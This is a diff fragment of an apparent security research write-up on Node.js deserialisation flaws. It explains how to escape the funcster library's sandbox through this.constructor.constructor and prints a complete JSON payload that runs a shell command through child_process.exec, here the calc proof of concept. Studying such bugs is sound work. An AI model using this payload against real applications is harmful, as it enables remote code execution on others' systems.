klezVirus/klezVirus.github.io/The_Big_Problem_of_Serialisation/readme.md

 142. return sandbox.module.exports;
 ```

-For this reason, we cannot directly call function as `require()`.
-However, we can still exploit it via sandbox bypassing.
+For this reason, it is not possible to call a function as `require()` directly.
+However, the process is still exploitable via sandbox bypassing.
 The common technique to achieve that is to access global objects via `this.constructor.costructor`.
 This payload can be used to achieve RCE on an application using `require('funcster').unserialize()`:

 ```js
 {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}